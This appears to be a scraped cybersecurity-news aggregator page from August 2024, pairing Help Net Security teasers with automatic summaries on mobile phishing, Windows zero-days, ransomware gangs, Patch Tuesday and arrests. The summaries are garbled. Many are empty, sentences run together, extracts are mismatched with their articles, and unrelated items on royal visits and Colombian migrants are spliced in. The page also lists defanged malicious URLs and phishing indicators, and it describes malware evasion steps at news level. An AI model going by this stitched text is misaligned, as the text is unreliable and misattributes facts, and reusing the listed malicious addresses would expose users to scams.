"ESET researchers discovered an uncommon type of phishing campaign targeting Android and iPhone users. They analyzed a case observed in the wild that targeted clients of a prominent Czech bank. PWA phishing flow (Source: ESET) This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation. On Android, this could result in the silent installation of a special kind of APK, which even … More
The post New phishing method targets Android and iPhone users appeared first on Help Net Security.
"Autosummary:
After opening the URL delivered in the first stage, Android victims are presented with two distinct campaigns, either a high-quality phishing page imitating the official Google Play store page for the targeted banking application, or a copycat website for that application. ESET finds phishing scams using calls, SMS, and malvertising ESET analysts discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms. "CVE-2024-38193, an actively exploited zero-day that Microsoft patched earlier this month, has been leveraged by North Korean hackers to install a rootkit on targets’ computers, Gen Digital researchers have revealed. About CVE-2024-38193 CVE-2024-38193 is a use-after-free vulnerability in the Windows Ancillary Function Driver for WinSock (AFD.sys). Gen Digital researchers Luigino Camastra and Milanek discovered in early June 2024 that the Lazarus APT group was exploiting the flaw to achieve SYSTEM privilege, so they can “bypass … More
The post 0-day in Windows driver exploited by North Korean hackers to deliver rootkit (CVE-2024-38193) appeared first on Help Net Security.
"Autosummary:
The Lazarus group is well known for delivering rootkits to targets, either by: Taking advantage of zero-day vulnerabilities they found in Windows drivers that are installed by default, or by Installing vulnerable third-party drivers and taking advantage of their 0-day or n-day flaws (this is the so-called “Bring Your Own Vulnerable Driver” technique). "Autosummary:
On Friday, a day after the PHP maintainers released CVE-2024-4577 patches, WatchTowr Labs released proof-of-concept (PoC) exploit code. "Autosummary:
"Autosummary:
Why you need to know about ransomware The most important services in your life are also the most attractive targets for ransomware gangs around the world, which is why your banks, grocery stores, hospitals, schools, government resources, and more could, without any fault of your own, suddenly grind to a halt. For years, cybercriminals have focused their ransomware attacks against the types of organizations that are essential for everyday life, including hospitals, schools, critical infrastructure, and entire city governments.Because of ransomware attacks in the past, surgeries have been delayed, classes have been cancelled, and, more recently, a credit union’s customers had their direct deposit payments thrown into disarray. "Autosummary:
Ransomware payments rose from $449.1 million to $459.8 million Pierluigi Paganini August 20, 2024 August 20, 2024 Blockchain analysis firm Chainalysis revealed that ransomware payments rose by approximately 2%, from $449.1 million to $459.8 million. "Autosummary:
The data allegedly included database dumps, project schematics, hiring documents, client details, marketing material, IT and infrastructure details, and quality assurance reports. "Autosummary:
"Autosummary:
"The malware has various capabilities such as the collection of data about the infected device, exfiltration of banking credentials, collection of screen recordings, etc.," Broadcom-owned Symantec said. "Autosummary:
"Autosummary:
Example of iOS installation (credit: Michal Bláha) After installation, the phishing PWA/WebAPK is added to the user’s home screen, and opening it leads to a phishing login page, directly in the application (Figure 13).Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only), or as a PWA for iOS and Android users (if the campaign is not WebAPK based).However, even without that feature, access to browser APIs gives PWAs the right to request access to microphone, geolocation, camera, and all other supported browser functions, meaning that spyware PWAs could be on the radar.Comparison between an installed phishing WebAPK (left) and real banking app (right) Furthermore, installing a WebAPK does not produce any of the “installation from an untrusted source” warnings, such as the example seen in Figure 8, that users are commonly trained to look for.WebAPK icon (left) and the in-app phishing login page (right) On top of all the previously mentioned hurdles for a regular user, the application’s info tab also states that the app was downloaded from the Google Play store, which is the default behavior (Figure 14).This is a standardized file that defines the logo, name, web application scope, sources, and service worker script of the application, as well as the launcher type.Installed phishing PWA (left) and real banking app (right) PWAs also have the advantage of a single codebase across multiple platforms, which now may also use modern browser APIs and even native code, thanks to WebAssembly.Upon inspection of the contacted C&C server, we uncovered an operator panel (Figure 16) that included sensitive information of victims, currently active phishing URLs, and a full history of visiting victims. After opening the URL delivered in the first stage, Android victims are presented with a high-quality phishing page imitating the official Google Play store page for the targeted banking application, or a copycat website for the application. "Cyber attacks against higher education institutions increased by 70% in 2023. This is largely due to legacy endpoint security management and practices, limited IT support staff, and overwhelming amounts of data, much of which is PII (personally identifiable information). In this Help Net Security video, Doug Thompson, Chief Education Architect at Tanium, discusses how higher education institutions can defend against even the most sophisticated threats/vulnerabilities despite limited resources. Institutions must approach endpoint security management with … More
The post Protecting academic assets: How higher education can enhance cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The Mad Liberator ransomware group uses social-engineering techniques Pierluigi Paganini August 19, 2024 August 19, 2024 New cybercrime group Mad Liberator is targeting AnyDesk users and runs a fake Microsoft Windows update screen to conceal data exfiltrating.The attack lasted almost four hours, at the conclusion of which the attacker terminated the fake update screen and ended the Anydesk session, giving control of the device back to the victim.” continues the researchers. "Effectively converging, managing and using enterprise data is a huge undertaking. Enterprises have vast hoards of data, but those hoards exist within siloed systems and applications, and it requires a lot of manual effort by highly skilled data scientists, engineers and analysts to extract value from all that data. Data preparation is a rudimentary and necessary task, but it prevents engineers from focusing their time on the high-value tasks like identifying security gaps or storytelling … More
The post To improve your cybersecurity posture, focus on the data appeared first on Help Net Security.
"Autosummary:
This initiative requires that you: Understand that it needs the right data feeds Evaluate your data state Identify data sources across the business Understand how you can collect these datasets Understand how to combine, normalize and transform this data for greater business context and insights Build reporting on this layer and share with stakeholders One of the biggest struggles that security teams have is identifying which data sources are needed for full visibility into their security posture and how these sources can support various efforts, such as continuous controls monitoring or automated threat hunting. Looking for data in all the right places A security data fabric approach helps with transforming raw data into analysis-ready datasets, streamlining data analysis workflows, enabling data quality and integrity, and ultimately facilitating a stronger security posture. Once you’ve located the needed data sources and who’s in charge of them, and gotten their buy-in, the next step is figuring out how to get the data into your security data fabric platform. "x64dbg is an open-source binary debugger for Windows, designed for malware analysis and reverse engineering of executables without access to the source code. It offers a wide range of features and a plugin system, allowing you to customize and extend its capabilities to suit your needs. “Probably the reason people like x64dbg is that it has a UI that makes it easy to jump around and automatically displays context for what’s happening in the process. … More
The post x64dbg: Open-source binary debugger for Windows appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Examples of the services used to facilitate the en masse distribution of SMS messages include Amazon Simple Notification Service (SNS), Nexmo, Plivo, Proovl, Send99, Telesign, Telnyx, TextBelt, Twilio. "Autosummary:
We are sharing Ivanti vTM devices exposed on the Internet in our Device ID report https://t.co/1uPaaDBQcc (no vulnerability assessment) Only 31 found 2024-08-17, but today we observed an exploit attempt based on the public PoC. Dashboard: https://t.co/9Q8PnD9DyT pic.twitter.com/6kFgTJrBsl — The Shadowserver Foundation (@Shadowserver) August 18, 2024 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – ransomware, Ivanti vTM) "Autosummary:
Microsoft Zero-Day CVE-2024-38193 was exploited by North Korea-linked Lazarus APT Pierluigi Paganini August 19, 2024 August 19, 2024 Microsoft addressed a zero-day vulnerability actively exploited by the North-Korea-linked Lazarus APT group. Microsoft has addressed a zero-day vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), which has been exploited by the North Korea-linked Lazarus APT group. "Autosummary:
Social engineering efforts have further cashed in on the popularity of the generative artificial intelligence (AI) wave to set up scam domains mimicking OpenAI ChatGPT to proliferate suspicious and malicious activity, including phishing, grayware, ransomware, and command-and-control (C2). "Autosummary:
"Autosummary:
"Autosummary:
Ransom payment inflows (2023 - orange, 2024 - blue) Source: Chainalysis Chainalysis says the number of confirmed ransomware attacks, according to eCrime.ch intelligence, has grown by 10% YoY in 2024, while a similar increase can be seen in the number of victims published on extortion portals on the dark web. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Jenkins Command Line Interface (CLI) Path Traversal vulnerability, tracked as CVE-2024-23897 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
He added: “For as long as people are allowed to spread lies, abuse, harass - then social cohesion as we know it has completely broken down.But as a result, some royal watchers did raise questions like: why do such a high-profile visit which seems, in part, about publicity too for both the hosts and the guests? "Autosummary:
"Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data. "Autosummary:
"Autosummary:
The malicious code checks if it’s running in a virtual machine by enumerating all services and looking for VM-related strings like “VMWARE Tools,” “VMWare 共享,” “Virtual Machine,” and “VirtualBox Guest” in service display names.If any of these processes remain active, the malware injects shellcode with an embedded DLL into the lsass process, which grants it higher privileges, then also attempts to terminate AV processes, and modifies registry settings to disable or weaken the AV products’ autostart capabilities. "Autosummary:
Fake "Norton" virus-detected alerts (BleepingComputer) Fake "Adobe Flash Player" ad pushed by these domains (BleepingComputer) We observed many of these domains embedded ad-serving scripts like hxxps://moremashup[.]com/js/ads.js Some of these would go a step further and inject one-liner obfuscated scripts on the page, e.g. from hxxps://satisfactorymetalrub[.]com/8438b16ee31e72c66f3abda855a57488/invoke.js Obfuscated one-liner JavaScript injected by embedded scripts (BleepingComputer) Some of the URLs associated with this disinformation campaign identified by BleepingComputer are listed below: hxxps://cancerresearch.blob.core.windows[.]net/breakthrough/carol-burnett-stroke.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork2/bill-paxton-wife-louise-newbury-death.html hxxps://applebulletin.blob.core.windows[.]net/bergenews5/is-randy-travis-dead.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork15/tarrare-death-cause.html hxxps://newscentralstation.blob.core.windows[.]net/channel10/steve-harvey-accident.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork13/who-is-tom-hardy-married-to.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork15/mikayla-campinos-leakd.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork5/sinbads-children.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork12/was-kim-porter-mixed.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork12/donnie-and-jenny-divorce-2024.html hxxps://sopnews.blob.core.windows[.]net/jazz8/michael-c-hall-height.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork13/did-chris-change-his-name.html hxxps://flashnews2.s3.uk.io.cloud.ovh[.]net/harry-connick-jr-stroke.html hxxps://ashghali[.]com/automotive8/did-harry-connick-jr-have-a-stroke.html hxxps://globalinternationalnews.blob.core.windows[.]net/globalinternationalnews3/harry-connick-jr-stroke.html hxxps://interestnews.blob.core.windows[.]net/topictribune3/harry-connick-jr-stroke.html Readers should refrain from visiting search results pointing to aforementioned URL structures particularly when these appear to contain bold, unverified claims about public figures and entities which are otherwise not mentioned by credible sources. "Autosummary:
Upon information and belief, such sensitive information includes, but is not limited to, Plaintiff’s and Class Members’ full names; current and past addresses (spanning at least the last three decades); Social Security numbers; information about parents, siblings, and other relatives (including some who have been deceased for nearly 20 years); and/or other personal information (collectively defined herein as “PII”).” “On April 8, a cybercriminal group by the name of USDoD posted a database entitled “National Public Data” on a dark web forum, claiming to have the personal data of 2.9 billion people, according to the complaint filed Thursday in the US District Court for the Southern District of Florida, which said the group put the database up for sale for $3.5 million.” reported Bloomberg law. "Autosummary:
"Autosummary:
"Cyber threats continued to intensify in the first half of 2024 as cybercriminals exploited security gaps from growing business and technological consolidation, according to Resilience. Consolidation in business and tech fuels new third-party risks Rebounding merger and acquisition (M&A) activity and increasing technology consolidation—in which industries rely on single suppliers for critical platform services—both created a staggering number of potential new points of failure for hackers to exploit. Global M&A deal volume increased 36% in … More
The post Business and tech consolidation opens doors for cybercriminals appeared first on Help Net Security.
"Autosummary:
Of all claims received since January 2023, 35% were the result of a vendor data breach or ransom attack exploiting a third-party vendor—including notable vulnerabilities associated with Ivanti software—and in 2024 that number is already 40%, and expected to grow. "In this Help Net Security video, Frederic Najman, Executive Member of the SFPN (French Union of NoCode Professionals), discusses how NoCode and LowCode technologies enable companies to free up development resources to tackle cybersecurity issues. In a context where three-quarters of CISOs report that their organization has faced an application security incident in the past two years, NoCode and LowCode tools offer new options to free up resources and find solutions to minimize risk.
The post How NoCode and LowCode free up resources for cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Google Search ads that target users looking for Google’s own services lead them to spoofed sites and Microsoft and Apple tech support scams. The fake Google Search ads (Source: Malwarebytes) “In this particular scheme, all web resources used from start to finish are provided by cloud providers, often free of charge. That means more flexibility for the criminals while increasing difficulty to block,” Malwarebytes researcher Jérôme Segura notes. Google ads leading to tech support scams … More
The post Tech support scammers impersonate Google via malicious search ads appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC. The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the malware using bogus sites and social media accounts. "Autosummary:
The attack sequence is a multi-stage process that starts with a first-stage loader that impersonates legitimate applications like Microsoft Office to make them appear harmless (e.g., "工商年报大师.exe" or "补单对接更新记录txt.exe"). "Autosummary:
Banshee Stealer can target data from nine different browsers, Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari. "Autosummary:
Web Help Desk (WHD) is IT help desk software widely used by large corporations, government agencies, and healthcare and education organizations worldwide to centralize, automate, and streamline help desk management tasks. "Autosummary:
"Multiple security missteps were present in the course of this campaign, including the following: Exposing environment variables, using long-lived credentials, and absence of least privilege architecture," Palo Alto Networks Unit 42 said in a Thursday report. "Autosummary:
The 27-year-old Russian national Georgy Kavzharadze (also known as “George,” “TeRorPP,” “Torqovec,” and “PlutuSS”) has been sentenced to over three years in prison for selling financial information, login credentials, and other personal data on the dark web marketplace, Slilpp. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SolarWinds Web Help Desk deserialization of untrusted data vulnerability, tracked as CVE-2024-28986 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
"Autosummary:
A massive cyber attack hit Central Bank of Iran and other Iranian banks Pierluigi Paganini August 15, 2024 August 15, 2024 Iranian news outlet reported that a major cyber attack targeted the Central Bank of Iran (CBI) and several other banks causing disruptions. "Autosummary:
"Autosummary:
"Autosummary:
"A combination of misconfigurations and security flaws can make artifacts leak tokens, both of third party cloud services and GitHub tokens, making them available for anyone with read access to the repository to consume," Palo Alto Networks Unit 42 researcher Yaron Avital said in a report published this week. "Autosummary:
Black Basta ransomware gang linked to a SystemBC malware campaign Pierluigi Paganini August 15, 2024 August 15, 2024 Experts linked an ongoing social engineering campaign, aimed at deploying the malware SystemBC, to the Black Basta ransomware group. "SolarWinds has fixed a critical vulnerability (CVE-2024-28986) in its Web Help Desk (WHD) solution that may allow attackers to run commands on the host machine. “While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing. However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available,” the company advises. About CVE-2024-28986 SolarWinds Web Help Desk … More
The post Critical RCE bug in SolarWinds Web Help Desk fixed (CVE-2024-28986) appeared first on Help Net Security.
"Autosummary:
The latter step is not the last, because they will also have to copy-paste some files and manually modify a file, but luckily SolarWinds explains the who procedure clearly in the security advisory, as well as offers instructions on how to uninstall the hotfix (if needed). "Autosummary:
"When the cost of discovery remains low, phishing remains not only an effective technique, but a way to continue global targeting while avoiding exposing more sophisticated (and expensive) capabilities to discovery," the Citizen Lab said. "Autosummary:
"After the malware creates a new service for the driver, starts the service, and loads the driver, it enters an endless loop that continuously enumerates the running processes, terminating processes if their name appears in a hardcoded list of targets," Klopsch added. "Autosummary:
Indicators of Compromise Google advertiser accounts 08141293921851408385 Dhruv 06037672575822200833 Looker Studio URLs lookerstudio[.]google[.]com/embed/reporting/fa7aca93-cabd-47bf-bae3-cb5e299c8884/ lookerstudio[.]google[.]com/embed/reporting/42b6f86d-2a06-4b38-9f94-808a75572bb8/ lookerstudio[.]google[.]com/embed/reporting/fbd88a24-af73-4c76-94dc-5c55345e291d/ Figure 3: A fake Google home page, displayed via Looker Studio rendering an image Opening Developer Tools in Chrome, we can see that the “Google search page” is indeed just one large image: Figure 4: The actual image for the so-called Google home page What’s interesting is how this image is used as a lure that requires some user interaction to trigger an action. "Autosummary:
Jess Wanless/NRC Migrants heading north have to cross the Gulf of Urabá by boat before embarking on the dangerous trek across the Darién Gap Eight years after the Colombian government signed a peace agreement with the country"s largest rebel group, the Revolutionary Armed Forces of Colombia (Farc), violence has reached "devastating" levels, according to the NRC. "Autosummary:
"Cloud Security Specialist EPAM Systems | Chile | Remote – View job details As a Cloud Security Specialist, you will be responsible for creating and maintaining security policies and assisting in the implementation and automation of security solutions within cloud environments. Assist in CSPM tool testing and scoring and CSPM strategic tool implementation. Create and maintain Logic Apps for automation of responses and tickets and create KPI reporting. upport GIS Engineering initiatives. Cloud Security Specialist … More
The post Cybersecurity jobs available right now: August 14, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Manager, Cloud Security Operations Vanguard | Japan | Remote – View job details As a Senior Manager, Cloud Security Operations, you will oversee the development and delivery of IT security standards and best practices, to conduct formal incident investigations, lead advanced incident handling scenarios including internal and external data breaches, abnormal network and host activity, and assess risk derived from a platform or data-lake. Cyber Security Network Engineer Mitsubishi Chemical Europe | Germany | On-site – View job details As a Cyber Security Network Engineer, you will be responsible for the support, administation, planning and further development of the Cisco network infrastructure (LAN/WLAN) as well as the European WAN, the firewall, VPN and security systems. Information Security Analyst Jumia Group | Egypt | On-site – View job details As an Information Security Analyst, you will contribute to the improvement of processes and procedures by analyzing process performance data and measures, comparing process performance against performance targets, reporting process performance information, and recommending changes to processes, performance measures and/or targets to maximize process performance. Information Security Manager Whizmo | UAE | On-site – View job details As an Information Security Manager, you will develop, enforce, and govern security policies to protect critical data, information, and knowledge assets. Information Security Specialist – Red Team Operator TD | Canada | Hybrid – View job details As an Information Security Specialist – Red Team Operator, you will conduct penetration testing for network, system, application, mobile, traditional web and wireless. "Autosummary:
Four of the below CVEs are listed as publicly known - CVE-2024-38200 (CVSS score: 7.5) - Microsoft Office Spoofing Vulnerability (CVSS score: 7.5) - Microsoft Office Spoofing Vulnerability CVE-2024-38199 (CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability (CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability CVE-2024-21302 (CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability (CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability CVE-2024-38202 (CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability "An attacker could leverage this vulnerability by enticing a victim to access a specially crafted file, likely via a phishing email," Scott Caveza, staff research engineer at Tenable, said about CVE-2024-38200. "Autosummary:
In one example, deepfake video footage of Sir Keir Starmer assured viewers that "this is not a scam", while claiming they had been selected to earn a "life-changing" amount of money: "Your life is about to change. "Autosummary:
The attackers gained access to patients’ names, dates of birth, Social Security numbers, driver’s licenses or government-issued identification numbers, medical record numbers, medical treatment and condition information, medical diagnoses, medication information, and health insurance information. "Autosummary:
Patch Tuesday security updates for August 2024 addressed 90 vulnerabilities in Microsoft products including Windows and Windows Components; Office and Office Components; .NET and Visual Studio; Azure; Co-Pilot; Microsoft Dynamics; Teams; and Secure Boot and others, bringing the total to 102 when including third-party bugs.Microsoft Patch Tuesday security updates for August 2024 addressed six actively exploited bugs Pierluigi Paganini August 14, 2024 August 14, 2024 Microsoft’s August 2024 Patch Tuesday addressed 90 vulnerabilities, including six that are actively exploited. "Autosummary:
"On various occasions, Silnikau allegedly distributed information and tools to Ransom Cartel participants, including information about compromised computers, such as stolen credentials, and tools such as those designed to encrypt or "lock" compromised computers," the DoJ noted. "Autosummary:
" “The CDK outage disrupted operations resulting in lost sales and profits, OEM inventory grew across the industry causing higher days supply in key brands and impacting floorplan costs, and rising unemployment combined with falling GDP in a still elevated rate environment perpetuated consumer uncertainty” - Paul Antony, AutoCanada’s Chairman In numbers, AutoCanada recorded losses of $33.1 million in Q2 2024, whereas in the same quarter last year, it had a profit of $45.2 million. "Autosummary:
"Autosummary:
Image Spanish police, supported by officers from UK and US law enforcement agencies, arrested 38-year-old Maksim Silnikau, also known as Maksym Silnikov, at an apartment in Estepona, southern Spain, in July 2023. "Autosummary:
"Autosummary:
Largest online market for stolen credentials The U.S. Department of Justice announced the takedown of Slilpp on June 10, 2021, following a joint operation with law enforcement agencies from the United States, Germany, the Netherlands, and Romania, who seized servers used to host Slilpp"s infrastructure. "In this Help Net Security interview, Dean Hamilton, CTO at Wilson Perumal & Company, discusses the complexities of zero trust network access (ZTNA) implementation, focusing on balancing security with operational efficiency. Hamilton highlights strategic planning, collaboration between IT and business leaders, adapting to emerging challenges, continuous improvement, and using metrics to assess ZTNA success and manage risks. ZTNA implementation is associated with increased IT spending and operational complexity. How can businesses strike a balance between … More
The post Key metrics for monitoring and improving ZTNA implementations appeared first on Help Net Security.
"Autosummary:
Careful up-front investment in three key areas is critical to finding balance for IT and avoiding adverse impacts on the business: Enterprise Architecture (EA) management is the practice of documenting and understanding how IT resources (infrastructure, services, applications, and data) align with business objectives, organizational elements, and business processes.While some of that spending is associated with licenses for enablement technologies that provide granular network segmentation, policy management, policy enforcement, device assessment, etc., the majority of the increased cost comes from the operational overhead required to define and maintain granular network and application access policies that are calibrated to the specific needs of each business. Rate of valid business user trouble tickets requiring policy modification Time to resolve business user policy-related tickets Time to detect policy misconfiguration Time to resolve policy misconfiguration Engagement of non-IT end-users in policy updates Cybersecurity literacy of executives and business leaders What new challenges and opportunities should organizations anticipate as they refine their ZTNA strategies? "Autosummary:
"FBI Cleveland announced the disruption of “Radar/Dispossessor”—the criminal ransomware group led by the online moniker “Brain”—and the dismantling of three U.S. servers, three United Kingdom servers, 18 German servers, eight U.S.-based criminal domains, and one German-based criminal domain. Since its inception in August 2023, Radar/Dispossessor has quickly developed into an internationally impactful ransomware group, targeting and attacking small-to-mid-sized businesses and organizations from the production, development, education, healthcare, financial services, and transportation sectors. Originally focused on … More
The post International investigation shuts down Radar/Dispossessor ransomware group appeared first on Help Net Security.
"Autosummary:
Originally focused on entities in the United States, the investigation discovered 43 companies as victims of the attacks, from countries including Argentina, Australia, Belgium, Brazil, Honduras, India, Canada, Croatia, Peru, Poland, the United Kingdom, the United Arab Emirates, and Germany. "Autosummary:
As many as 43 companies have been identified as victims of Dispossessor attacks, including those located in Argentina, Australia, Belgium, Brazil, Canada, Croatia, Germany, Honduras, India, Peru, Poland, the U.A.E., the U.K., and the U.S. Dispossessor first emerged in August 2023 as a ransomware-as-a-service (RaaS) group following the same dual-extortion model pioneered by other e-crime gangs. "Autosummary:
“In reality, clicking the link downloads an MSI file (e.g., “Scan_docs#40562153.msi”), which, when opened, triggers the ANONVNC (MESHAGENT) malware. "Autosummary:
Security challenges that come with enabling gen AI tools include: Employees have access to far too much data Sensitive data is often not labeled or is mislabeled Insiders can quickly find and exfiltrate data using natural language Attackers can discover secrets for privilege escalation and lateral movement Right-sizing access is impossible to do manually Generative AI can create new sensitive data rapidly These data security challenges aren"t new, but they are highly exploitable, given the speed and ease at which gen AI surfaces information. It"s a bad idea to let copilots loose in your organization if you"re not confident that you know where you have sensitive data, what that sensitive data is, cannot analyze exposure and risks, and cannot close security gaps and fix misconfigurations efficiently. "Autosummary:
Co-conspirators Volodymyr Kadariya, a Belarussian and Ukrainian national, 38, and Andrei Tarasov, a Russian national, 33, were also charged for their role in the malvertising operation.- NCA Maksim Silnikau faces significant legal consequences based on the charges in both indictments, including imprisonment sentences for wire fraud, computer fraud, computer fraud and abuse, aggravated identity theft, and access device fraud. "Guardio launched a new feature, Critical Security Alerts, which enables real-time alerts to identify and prevent financial scams, ensuring immediate intervention when suspicious browsing patterns are detected. According to the Federal Trade Commission, consumers in the United States lost over 10 billion dollars to fraud schemes. Bank transfers and fraudulent payments accounted for the highest losses, closely followed by cryptocurrency scams – all schemes that take place entirely online. Often, scammers approach a consumer with … More
The post Guardio Critical Security Alerts monitors and analyzes scam activities appeared first on Help Net Security.
"Autosummary:
"Orion S.A., a global chemical company with headquarters in Luxembourg, has become a victim of fraud: it lost approximately $60 million through “multiple fraudulently induced outbound wire transfers to accounts controlled by unknown third parties.” The scammers targeted an employee Orion S.A. is a manufacturer and supplier of carbon black, a solid form of carbon that’s used for manufacturing many everyday products, such as tires, textiles, and printing ink. “Orion has innovation centers on three … More
The post Scammers dupe chemical company into wiring $60 million appeared first on Help Net Security.
"Autosummary:
“The Company has cooperated, and will continue to cooperate, with law enforcement as appropriate, and intends to pursue recovery of these funds through all legally available means, including potentially available insurance coverage.” "Australian gold mining firm Evolution Mining has announced on Monday that it became aware on 8 August 2024 of a ransomware attack impacting its IT systems, and has been working with its external cyber forensic experts to investigate the incident. “Based on work to date, the Company believes the incident is now contained,” Evolution Mining said. “The Company does not anticipate any material impact on operations.” There has been no mention of data stolen before … More
The post Australian gold mining company hit with ransomware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Improper validation in a model specific register (MSR) could allow a malicious program with ring0 access to modify SMM configuration while SMI lock is enabled, potentially leading to arbitrary code execution," AMD noted in an advisory, stating it intends to release updates to Original Equipment Manufacturers (OEM) to mitigate the issue. "Autosummary:
The number of bugs in each vulnerability category is listed below: 36 Elevation of Privilege Vulnerabilities 4 Security Feature Bypass Vulnerabilities 28 Remote Code Execution Vulnerabilities 8 Information Disclosure Vulnerabilities 6 Denial of Service Vulnerabilities 7 Spoofing Vulnerabilities The number of bugs listed above do not include Microsoft Edge flaws that were disclosed earlier this month. The six actively exploited zero-day vulnerabilities in today"s updates are: CVE-2024-38178 - Scripting Engine Memory Corruption Vulnerability Microsoft says that the attack requires an authenticated client to click a link in order for an unauthenticated attacker to initiate remote code execution. "Autosummary:
The company also warned of a third zero-day (a server-side request forgery bug tracked as CVE-2024-21893) under mass exploitation in February, allowing threat actors to bypass authentication on unpatched ICS, IPS, and ZTA gateways. "Autosummary:
"Autosummary:
"Autosummary:
" Windows SmartScreen abused in malware attacks In the March attacks, DarkGate malware operators exploited this Windows SmartScreen bypass (CVE-2024-21412) to deploy malicious payloads camouflaged as installers for Apple iTunes, Notion, NVIDIA, and other legitimate software. "August 2024 Patch Tuesday is here, and Microsoft has delivered fixes for 90 vulnerabilities, six of which have been exploited in the wild as zero-days, and four are publicly known. The zero-days under attack CVE-2024-38178 is a Scripting Engine Memory Corruption Vulnerability that could lead to remote code execution. Reported by AhnLab and South Korea’s National Cyber Security Center (NCSC), the flaw can be successfully exploited only if the target uses Microsoft Edge in Internet … More
The post Microsoft fixes 6 zero-days under active attack appeared first on Help Net Security.
"Autosummary:
This group includes two server-side request forgery (SSRF) flaws discovered by Tenable researchers, one (CVE-2024-38206) in Microsoft’s Copilot Studio (an AI-powered chatbot) that could lead to information disclosure, and the other (CVE-2024-38109) affecting Azure Health Bot, which can be abused to escalate privileges and access cross-tenant resources. CVE-2024-21302, an EoP flaw in Windows Secure Kernel Mode, and CVE-2024-38202, an EoP in the Windows Update Stack, were revealed by SafeBreach researcher Alon Leviev at Black Hat last week. "Autosummary:
A PoC exploit code is available for critical Ivanti vTM bug Pierluigi Paganini August 13, 2024 August 13, 2024 Ivanti warned of a critical authentication bypass flaw in its Virtual Traffic Manager (vTM) appliances that can allow attackers to create rogue administrator accounts. "Autosummary:
Apart from building fake online relationships, the tactics of many online fraudsters often involve creating scenarios that demand urgent action or rely on other ruses, including purported bank or PayPal account takeovers, devices compromised with malware, failed package deliveries, and even kidnapped relatives and other schemes leveraging artificial intelligence (AI). Raising the safety net Thankfully, there are a few ways people and businesses can stay free of phone scams: Validate: Never answer or interact with unknown callers/senders, and whenever you receive a request for personal data from a “trusted” entity, call them first and ask whether the request you received was genuine. Throw me some numbers Let’s now look at how phone numbers fit into this, why they are, together with account login credentials, so valuable to scammers, and how they can be leveraged for malicious ends. Smishing and hacking For starters, threat actors could target you with malware disguised as benign links or attachments that will, however, install spyware or other malware on your device or exfiltrate your personal data from it. "An alarming trend toward multiple, sometimes simultaneous cyber attacks forces business leaders to re-evaluate their cyber resilience strategies to address common points of failure, including inadequate identity system backup and recovery practices, according to Semperis. Survey of nearly 1,000 IT and security professionals shows 83% of organizations were targeted by ransomware attacks in the past year with a high degree of success, sounding alarming trends in attack frequency, severity, and consequences. Companies are suffering successful … More
The post 74% of ransomware victims were attacked multiple times in a year appeared first on Help Net Security.
"Autosummary:
Identity is the new security perimeter Although 70% of respondents said they had an identity recovery plan, signaling strong progress towards IAM-centric security, only 27% reported having dedicated, AD-specific backup systems.Without AD-specific, malware-free backups and a tested, cyber-specific recovery plan, recovery will be prolonged, increasing the chance that the organization will decide to pay ransom to restore business operations. "Autosummary:
According to the CISA/FBI joint advisory: "Ransom demands have typically ranged from approximately $1 million to $10 million USD, with payment demanded in Bitcoin. "Autosummary:
"An unauthenticated attacker can gain root access to the Cosy+ by combining the found vulnerabilities and e.g., waiting for an admin user to log in to the device," Abrell said. "Autosummary:
The attackers used the results of the utility’s work on their side as a unique key to encrypt the payload file, which can only be decrypted on the victim’s computer, after which they downloaded the following files to the infected computers: Attackers also employed a previously undetected malware dubbed PlugY, which is downloaded through the CloudSorcerer backdoor. "Autosummary:
Windows CVE-2024-24974 openvpnserv Unauthorized access Windows CVE-2024-27903 openvpnserv Remote code execution (RCE) Windows Local privilege escalation (LPE), data manipulation Android, iOS, macOS, BSD CVE-2024-1305 Windows TAP driver Denial of service (DoS) Windows An attack can exploit these vulnerabilities after obtaining a user’s credentials through differed methods, such as purchasing them on the dark web, using an info stealer, or capturing NTLMv2 hashes from network traffic and cracking them with tools like HashCat or John the Ripper. "Autosummary:
Browser Guard uses dynamic rules for two purposes: Session rules are dynamic rules that can be added and removed at runtime, but they are session-scoped and are cleared when the browser shuts down and when a new version of the browser is installed. "Autosummary:
